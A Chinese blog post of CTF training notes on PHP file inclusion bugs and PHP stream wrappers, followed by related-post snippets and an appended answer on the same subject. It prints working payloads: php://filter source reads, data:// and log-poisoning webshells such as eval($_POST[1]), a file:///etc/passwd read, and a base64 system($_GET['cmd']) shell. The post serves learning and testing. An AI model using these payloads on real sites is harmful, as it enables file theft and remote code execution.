文件包含漏洞+php伪协议

已于 2022-04-22 20:37:24 修改
阅读量7.9k 收藏 97
点赞数 5
分类专栏: CTF训练日记 文件上传 文章标签: php 安全 开发语言
于 2021-11-11 21:46:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/unexpectedthing/article/details/121276653
版权

文章目录

常见的文件包含函数

php文件包含函数有下面四种

  • include()
  • require()
  • include_once()
  • require_once()
    include与require基本相同,只是一些错误处理不同
  1. include:遇到错误只发出警告,不会出现停止
  2. require:遇到错误要停止
  3. include_once和require_once:只包含一次

基本绕过:

利用php伪协议

1.php://input

php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容,从而导致任意代码执行。
CTF中经常使用file_get_contents()获取php://input内容(POST)
需要allow_url_include打开
在这里插入图片描述
当enctype="multipart/form-data"的时候 php://input` 是无效的
例子一

2.php://filter

php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行,从而导致 任意文件读取。
在allow_url_fopen,allow_url_include都关闭的情况下可以正常使用

参数详解

resource=<要过滤的数据流>     这个参数是必须的。它指定了你要筛选过滤的数据流。(相对路径也可)
read=<读链的筛选列表>         该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
write=<写链的筛选列表>    该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。

过滤器

读取文件源码可以直接用resource读取(常用)
php://filter/convert.base64-encode/resource=flag.php	base64编码 ---最常用的
php://filter/convert.quoted-printable-encode/resource=flag.php quoted-printable编码
php://filter/string.rot13/resource=flag.php rot13变换
字符串过滤器 作用
string.rot13 等同于str_rot13(),rot13变换
string.toupper 等同于strtoupper(),转大写字母
string.tolower 等同于strtolower(),转小写字母
string.strip_tags 等同于strip_tags(),去除html、PHP语言标签
转换过滤器 作用
convert.base64-encode & convert.base64-decode 等同于base64_encode()base64_decode(),base64编码解码
convert.quoted-printable-encode & convert.quoted-printable-decode quoted-printable 字符串与 8-bit 字符串编码解码
压缩过滤器 作用
zlib.deflate & zlib.inflate 在本地文件系统中创建 gzip 兼容文件的方法,但不产生命令行工具如 gzip的头和尾信息。只是压缩和解压数据流中的有效载荷部分。
bzip2.compress & bzip2.decompress 同上,在本地文件系统中创建 bz2 兼容文件的方法。
加密过滤器 作用
mcrypt.* libmcrypt 对称加密算法
mdecrypt.* libmcrypt 对称解密算法文件的打开方式
3.data协议

data协议类似于php://input协议,用于控制输出流,当与包含函数结合时,data://流回被当作php文件执行。从而导致任意代码的执行。
当php被过滤时,就可以适当选择data协议
需满足allow_url_fopen,allow_url_include同时开启才能使用
例如:

?file=data://,<php phpinfo();
?file=data://text/plain,<?php phpinfo();---恶意代码
?file=data://text/plain;base64,base编码内容(恶意代码的base64编码)

注意:使用data协议,后面php代码不要闭合。

4.zip协议

zip:// 可以访问压缩包里面的文件。当它与包含函数结合时,zip://流会被当作php文件执行。从而实现任意代码执行。

  1. zip://中只能传入绝对路径。
  2. 要用#分隔压缩包和压缩包里的内容,并且#要用url编码%23(即下述POC中#要用%23替换)
  3. 只需要是zip的压缩包即可,后缀名可以任意更改。
    在这里插入图片描述

5.bzip2://协议

绝对路径和相对路径都可以使用
在allow_url_fopen,allow_url_include都关闭的情况下可以正常使用

file.php?file=compress.bzip2://nac.bz2
file.php?file=compress.bzip2://./nac.jpg
file.php?file=compress.bzip2://D:/soft/phpStudy/WWW/file.jpg

6.zlib://协议

同上
在allow_url_fopen,allow_url_include都关闭的情况下可以正常使用

file.php?file=compress.zlib://file.gz
file.php?file=compress.zlib://./nac.jpg
file.php?file=compress.zlib://D:/soft/phpStudy/WWW/file.jpg

7. phar://协议

phar:// 有点类似zip://同样可以导致 任意代码执行。

区别就是:phar://中相对路径和绝对路径都可以使用
在这里插入图片描述
phar://:PHP 归档,常常跟文件包含,文件上传结合着考察。当文件上传仅仅校验mime类型与文件后缀,可以通过以下命令进行利用
例子

nac.php(木马)->压缩->nac.zip->改后缀->nac.jpg->上传->phar://nac.jpg/nac.php
从而绕过。

8.file协议

用于访问本地文件系统,并且不受allow_url_fopen,allow_url_include的影响
file协议可以访问文件的绝对路径,相对路径
file://还经常和curl函数(SSRF)结合在一起
如:?file=file:///etc/passwd,有三条斜杠
例子1
例子2

总结

在这里插入图片描述

日志包含

介绍

WEB服务器一般会将用户的访问记录保存在访问日志中。那么我们可以根据日志记录的内容,精心构造请求,把PHP代码插入到日志文件中,通过文件包含漏洞来执行日志中的PHP代码。

利用条件
  • 对日志文件可读取
  • 知道日志文件的存储目录,一般可以通过phpinfo(),来读取日志文件
    在这里插入图片描述
漏洞利用流程
原理
如果访问一个不存在的资源时,如http://www.xxxx.com/<?php phpinfo(); ?>,则会记录在日志中,一般
我们是把恶意代码写入UA头里。但是代码中的敏感字符会被浏览器转码,我们可以通过burpsuit绕过
编码,就可以把<?php phpinfo(); ?> 写入apache,iis或者nginx的日志文件,然后可以通过包含日志文件来执行此代码,但前提是你得知道中间件日志文件的存储路径。
流程:
先刷新网页或者上传文件抓包,改UA头为恶意代码,<?php eval($_POST[1]);?>,<?php system("tac ../f*");>,
然后访问日志文件,执行恶意代码
日志文件路径
一)日志默认路径
(1) apache+Linux日志默认路径
        /etc/httpd/logs/access_log
或者
        /var/log/httpd/access_log
(2) apache+win2003日志默认路径
        D:\xampp\apache\logs\access.log
        D:\xampp\
最低0.47元/天 解锁文章
php文件包含 伪协议
m0_64361111的博客
02-28 1182
PHP有很多内置 URL风格的封装协议,这类协议与fopen()、 copy()、 file_exists()和filesize()的文件系统函数所提供的功能类似。 zip:// 伪协议 先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,如果可以上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传 在网站根目录创建1.txt,内容为 压缩,压缩后在浏览器访问 php://input ..
文件包含PHP伪协议学习笔记
2302_80935968的博客
03-22 1281
1.当allow_url_fopen=Off和allow_url_include=Off或allow_url_fopen=Off和allow_url_include=On时,文件包含失败。data:// 同样类似与php://input,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。2.当allow_url_fopen=On和allow_url_include=On时,include等其他包含函数才会将URL代表的文件包含执行,文件包含成功。
php伪协议文件包含
bring_coco的博客
05-14 3441
再说明一下,include()函数对文件后缀名无要求,而对其中的语法有要求,即使后缀名为txt,jpg也会被当做php文件解析,只要文件内是<?如果想要读取运行php文件的源码,可以先base64编码,再传入include函数,这样就不会被认为是php文件,不会执行,会输出文件的base64编码,再解码即可。命令:file://E:/phpStudy/PHPTutorial/WWW/DVWA-master/vulnerabilities/fi/2.txt。若采用rot13编码,对php文件中的<?
文件包含漏洞
m0_63628553的博客
04-22 677
和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。
【学习笔记】文件包含漏洞--相关习题
最新发布
2401_89344791的博客
04-24 442
用代码执行命令查看目录所含文件,发现flag.php
文件包含&php伪协议
Xiiaogu的博客
12-14 1167
将文件进行base64编码再读出,即在file=后,flag前加上php://filter/read=convert.base64-encode/resource=file=php://input,下方输入<?没有flag,再输入<?添加完数据后打开终端,查找目录下文件,输入ls,没有flag。返回查找根目录,输入ls /,里边有flag文件。
WEB入门——文件包含漏洞PHP伪协议
HasntStartIsOver的博客
06-04 1106
在程序员开发过程中,通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需在此编写,这种调用文件的过程一般被称为文件包含。随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校检或者校检被绕过就造成了文件包含漏洞
PHP伪协议-文件包含漏洞常用的伪协议
热门推荐
wangyuxiang946的博客
08-19 1万+
在实战中文件包含漏洞配合PHP伪协议可以发挥重大的作用,比如读取文件源码,任意命令执行或者开启后门获取webshell等,常用的伪协议php://filter 读取文件源码 php://input 任意代码执行 data://text/plain 任意代码执行 zip:// 配合文件上传开启后门 下面拿ctf.show WEB模块的第3关举个栗子,这一关存在文件包含漏洞 php://filter php://filter 协议可以对打开的数据流进行筛选和过滤,常用于读取文件..
PHP伪协议文件包含漏洞
z1moq的博客
08-26 382
文件包含漏洞 为了更好的使用代码的复用性,可以使用文件包含函数将文件包含进来,直接使用文件中的代码。但这就产生了文件包含漏洞,产生原因实在通过 PHP 的函数引入文件时,为了灵活包含文件会将被包含文件设置为变量,通过动态变量来引入需要包含的文件。此时如果用户对变量可控,二服务器端卫队变量进行合理的校验或者校验被绕过,就会导致文件包含漏洞 文件包含所用的函数 函数 功能 include() 代码执行到 include() 函数时将执行文件中的 PHP代码 include_once() 当重
文件包含时涉及PHP伪协议总结
qq_43256965的博客
05-14 1698
在做CTF题的时候文件包含题出现多次使用伪协议,学习了下伪协议就顺便写个博客防止以后忘记PHP伪协议总结温故而知新,宁静以致远。
文件包含漏洞-伪协议
weixin_53303754的博客
10-15 424
File://、php://filter、php://input、data://、http://、phar://、zip://
php伪协议漏洞_include(文件包含漏洞php伪协议)
weixin_39935257的博客
01-17 1165
点击tips查看元素,也并没有有用的信息,联想到题目,include想起了文件包含漏洞。构造payload?file=/../../../../../../flag.php没有返回东西。看完wq学到了一个新姿势:php伪代码构造payload?file=php://filter/read=convert.base64-encode/resource=flag.php使用 "php://filter...
php伪协议 文件包含(一)
weixin_51692662的博客
10-14 648
文件包含php伪协议
PHP伪协议精讲(文件包含漏洞)
2301_76251460的博客
07-21 1052
PHP伪协议
PHP-伪协议
摘星怪sec的blog
04-25 8065
常用的伪协议有就可以利用使用文件包含函数包含文件时,文件中的代码会被执行,如果想要读取文件源码,可以使用对文件内容进行编码,编码后的文件内容不会被执行,而是展示在页面中,我们将页面中的内容使用解码,就可以获取文件的源码了。
文件包含中的伪协议
My笔记的博客
05-15 1788
php.ini 中的两个重要选项 PHP 中几个比较重要的伪协议php://input 协议还可以用来生成一句话木马,这里假设我们用的之前的直接包含的php代码: 这是一个文件上传的页面可以上传一个文件上去 上传后发现失败了,那就说明不是文件上传的题目,我们在url地址栏发现了一个op参数和一个key参数,我们用文件审查查看一下源代码 点开后,看到一个op的参数,看到这个好参数我们会想到可能存在文件包含,比如我们改成upload 就变成了上传文件的页面,这里我们可以猜到通过op的参数包含不同的文件
文件包含&PHP伪协议
LztCode
11-24 219
文件包含漏洞的常见利用 思路:URL传一句话进去(bp抓包),文件包含日志文件执行 http://127.0.0.1/include.php?file=../Apache/logs/access.log&666=phpinfo(); //要使用php里面的功能就必须传一个参数进去 PHP伪协议 http://127.0.0.1/include.php?file=file://c:/Windows/win.ini 路径必须是绝对路径 php://filter读写文件(查账号密码) http://1
文件包含漏洞PHP伪协议
buffedon的博客
06-03 1232
文件包含漏洞PHP伪协议文件包含漏洞1. 原理攻击利用的原理攻击成功的条件2. 分类本地文件包含LFI的利用远程文件包含3. 文件上传漏洞防范禁止0字节在PHP中配置open_basedir尽量避免动态包含的变量allow_url_include置为off4. PHP伪协议file://http://ftp://php://php://stdin, php://stdout 和 php://stderrphp://inputphp://outputphp://fdphp://memory 和 php://
文件包含漏洞& 文件伪协议利用
永远都没有了
09-11 1933
可能你会问,为什么不是php后缀名而是txt格式,因为我尝试过了,如果是使用的是php格式,那么服务端访问的时候不仅不需要解析,而且只是单纯的访问我的php代码,执行的是我自己的脚本,而不是服务器。就有题目所说是远程包含漏洞,我也懒得测试了,可以发现输入百度链接的时候直接跳转,那么我们可以尝试构造一句话木马搭建在本地的服务,让文件包含解析到攻击者的文本文件而成功的触发到让脚本代码得到解析。我在测试的时候忘记了自己的网站服务是搭建在D盘里,而我的文件是在E盘所以我以为是我的文件包含代码写错了。
文件包含漏洞完成PHP六大伪协议复现
01-05
### PHP 文件包含漏洞使用伪协议复现 #### 利用 `file://` 伪协议读取本地文件 当应用程序允许通过用户输入指定要包含的文件路径时,攻击者可以尝试利用 `file://` 协议来访问服务器上的敏感文件。例如,在 phpMyAdmin 中可能存在未正确过滤用户输入的情况。 ```php <?php // 假设此代码片段来自有缺陷的应用程序逻辑 $filename = $_GET['page']; include($filename); ?> ``` 如果上述代码没有适当的安全措施,则可以通过如下 URL 来触发漏洞并读取 `/etc/passwd` 文件的内容: ``` http://example.com/vulnerable_page.php?page=file:///etc/passwd ``` 这将导致 Web 应用程序试图加载操作系统级别的配置文件而不是预期的有效页面[^1]。 #### 使用 `php://filter` 进行数据流操作 PHP 提供了一种特殊类型的封装器——`php://filter`,它能够应用于不同的 I/O 流以执行转换或编码/解码工作。对于某些版本中的 phpMyAdmin 或其他应用而言,可能被用来绕过简单的黑名单防护机制从而实现命令注入或其他恶意行为。 例如,下面的例子展示了如何创建一个经过 base64 编码后的字符串作为虚拟文件,并让 PHP 解析其内容当作正常的 PHP 脚本运行: ``` http://target/path/index.php?import=php://filter/read=convert.base64-decode/resource=dataPD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+ ``` 其中 `dataPD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+` 是 Base64 编码形式下的 PHP 反序列化有效载荷 `<?php system($_GET['cmd']); ?>`. 请注意实际环境中应当避免直接展示完整的攻击向量;这里仅用于说明目的[^2]. #### 数据库连接字符串 (`mysql:` 和 `pgsql:`) 虽然这些不是传统意义上的 "伪协议",但在特定条件下它们也可以成为潜在的风险点。比如在一个不安全地处理数据库 URI 的场景下, 攻击者可能会操纵参数去指向另一个不受信任的数据源. 然而, 更常见的是看到像这样的错误实践: ```sql $dbconn = pg_connect("host=localhost dbname=mydb user=someone password=secret"); if (!$dbconn) { die('Could not connect: ' . pg_last_error()); } ``` 假设这里的主机名是从外部可控渠道获得的话(如 GET 请求), 那么就有可能遭受 SQL 注入式的攻击变体或者是更复杂的中间人(MitM)攻击模式[^3]. #### ZIP 归档内嵌资源(`zip://`) ZIP 封装器使得可以从压缩包内部提取单个成员项作为独立实体对待。考虑到这一点之后, 如果某个 webapp 接受了一个由客户端提交过来 zip 文件并且基于该档案里的条目来进行动态导入动作... 那么只要构造好相应的 payload 并将其打包成 .zip 格式发送给目标站点即可完成整个过程. 具体来说就是先准备好含有恶意脚本的一组文件结构,再把它们全部塞进同一个容器里形成最终产物; 当服务端解析到这个特殊的请求时就会按照预设好的方式依次打开每层包裹直至触发展示隐藏深处的东西为止[^4]. #### HTTP(S) 请求重定向(`http(s)://`) 最后一种情况涉及到跨域资源共享(CORS)策略不当设置所引发的问题。假如某处功能模块依赖于远程地址提供的模板或者其他可执行组件来做渲染决策依据之一, 而此时又缺乏必要的身份验证环节或是权限校验流程设计得不够严谨周密, 则很容易造成未经授权的信息泄露风险甚至是完全控制权旁落他人之手的局面发生. 因此建议开发者们务必重视起这方面的工作,确保任何涉及网络通信的操作都遵循最佳实践经验指南行事[^5].
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值